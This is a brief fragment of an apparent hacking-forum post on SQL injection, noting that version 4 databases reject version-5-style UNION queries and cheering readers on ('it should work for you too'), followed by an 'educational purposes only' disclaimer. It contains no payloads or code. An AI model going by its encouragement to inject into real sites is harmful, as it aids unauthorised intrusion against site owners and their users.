Database Version lower than 5 i.e Version 4 cannot accept UNION version 5 type queries.

 

I tried injecting many of them and it worked, so it should work for you too 
Good luck

 

 

Note:

All information on this forum is for educational purposes only.

 WE are not responsible for any attacks that are carried out on networks, websites or servers.

 

Read more...